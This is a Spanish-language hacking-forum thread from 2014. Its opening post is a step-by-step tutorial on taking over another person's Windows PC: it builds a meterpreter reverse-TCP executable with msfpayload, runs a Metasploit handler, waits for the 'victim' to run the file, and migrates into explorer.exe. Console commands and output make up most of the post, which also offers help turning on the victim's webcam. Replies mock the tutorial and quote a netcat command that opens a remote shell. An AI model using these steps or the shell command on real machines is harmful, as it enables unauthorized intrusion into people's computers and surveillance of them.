Saludos a todos, hoy les voy a explicar como entrar a otra pc usando meterpreter.
Para esto necesitamos la herramienta BackTrack 5
1.) Abrimos una termina e iniciamos la sesión en metasploit framework y colocamos el payload que nos dará la sesión en meterpreter, nuestro ip y creamos el exploit con el nombre de click.exe,
root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMMM
MMMN$ vMMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmMMNMMMMMMN JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNR #MMMM MMMMMMM MMMM# dMMMM
MMMMNm ?MMNM MMMMN dMMMMM
MMMMMMN ´?MM MMMM NMMMMMM
MMMMMMNe ?NM MM? jMMMMMMMM
MMMMMMMMNm, eMMMMMMMMMM
MMMMMMMMMMNx MMMMMMMMMMMMM
MMMMMMMMMMMMMMMm+...+mMMMMMMMMMMMMMMMM
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --
=[ 927 exploits - 499 auxiliary - 151 post+ -- --
=[ 251 payloads - 28 encoders - 8 nops
msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
- exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options:
{"LHOST"=>"192.168.1.100", "LPORT"=>"4444"}
msf >
2.) Luego ponemos nuestra pc a que escuche el exploit con el payload que creamos, y nuestra dirección ip
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) >
3.) Iniciamos el exploit y esperamos a que la victima ejecute el exploit que ya fue pasado a su pc por un pendrive o lo bajo desde un servidor local
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.100:4444
- Starting the payload handler...
4.) Una vez la victima haya iniciando el exploit, nos cambiamos de proceso a Explorer.exe que en mi caso es el PID 1832. Para saber cual es el PID escriben "ps"
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.100:4444
- Starting the payload handler...
- Sending stage (752128 bytes) to 192.168.1.104
- Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.104:1171) at 2014-01-17 08:02:51 -0500
meterpreter > migrate 1832
- Migrating to 1832...
- Migration completed successfully.
meterpreter >
5.) Ahora la pc es nuestra, escribimos "help" podemos ver todas las cosas que podemos hacer.
si te interesa saber como encender una cámara web escríbeme un mensaje
PD: la M de Metasploit la hice yo XD
Está muy lindo, pero más sencillo sería que le pases netcat a "la victima" y le digas:
Hey! Ejecuta este programa usando la siguiente línea de comandos:
nc -l -p 12345 -e cmd
Y listo. El puerto 12345 se queda a la escucha de comandos de consola y no necesitas metasploit...
Saludos!
PD: Ojo! Lo anterior es una broma :) (No te ofendas, pero: esto es hacking avanzado!?!?!)
Cita de: MCKSys Argentina en 17 Enero 2014, 20:49 PM
Está muy lindo, pero más sencillo sería que le pases netcat a "la victima" y le digas:
Hey! Ejecuta este programa usando la siguiente línea de comandos:
nc -l -p 12345 -e cmd
Y listo. El puerto 12345 se queda a la escucha de comandos de consola y no necesitas metasploit...
Saludos!
PD: Ojo! Lo anterior es una broma :) (No te ofendas, pero: esto es hacking avanzado!?!?!)
Si es así, Me gustaría mirar tu Ultimate-Uber-Haxor-Advanced-Hacking-Guide.
Cita de: x64Core en 18 Enero 2014, 20:26 PM
Si es así, Me gustaría mirar tu Ultimate-Uber-Haxor-Advanced-Hacking-Guide.
No existen
guías así. Lo mejor del hacking, no está escrito. A estas alturas deberías saber eso... :P
Saludos!
Chicos aunque sea algo basico, es algo, y ha aportado un poco de su tiempo para colaborar en la comunidad.
Por mi parte gracias por participar ;)
Y si la M la hiciste tu, te quedo bien :)
Cita de: MCKSys Argentina en 18 Enero 2014, 20:44 PM
No existen guías así. Lo mejor del hacking, no está escrito. A estas alturas deberías saber eso... :P
Saludos!
¿Entonces que es lo que esperas encontrar?
Cita de: x64Core en 18 Enero 2014, 22:38 PM
¿Entonces que es lo que esperas encontrar?
Por lógica: algo más
avanzado de lo que se postea en hacking básico...
No te parece?
Hay que agradecer a MoonShadow este post y el tiempo que ha dedicado, eso es verdad, pero también hay que reconocer (coincido con MCKSys Argentina) que no debería estar en hacking avanzado.
Cita de: MCKSys Argentina en 19 Enero 2014, 21:57 PM
Por lógica: algo más avanzado de lo que se postea en hacking básico...
No te parece?
Cuenta la leyenda que existen user que no toleran a personas amantes de Ing. Inversa :laugh:
Cita de: MCKSys Argentina en 19 Enero 2014, 21:57 PM
Por lógica: algo más avanzado de lo que se postea en hacking básico...
No te parece?
Entonces esperamos mirar pronto tu guia para usuarios avanzados.
Cita de: .:UND3R:. en 20 Enero 2014, 04:04 AM
Cuenta la leyenda que existen user que no toleran a personas amantes de Ing. Inversa :laugh:
¿Qué tiene que ver con el tema? Pero si te imaginabas eso pues no, eso es algo tan ridiculo.
Cita de: x64Core en 20 Enero 2014, 18:57 PM
Entonces esperamos mirar pronto tu guia para usuarios avanzados.
Cita de: MCKSys Argentina en 18 Enero 2014, 20:44 PM
No existen guías así. Lo mejor del hacking, no está escrito. A estas alturas deberías saber eso... :P
Saludos!
;)
Buenassss , antes que nada , gracias por tomarte el tiempo de escribir un tuto , esta bueno que se haga bastante seguido.
Sobre el tuto , es muy pero muy basico , no deberia estar en esta sección.
Consejo:
Trata de escribir tus propios programas y no depender de estos frameworks.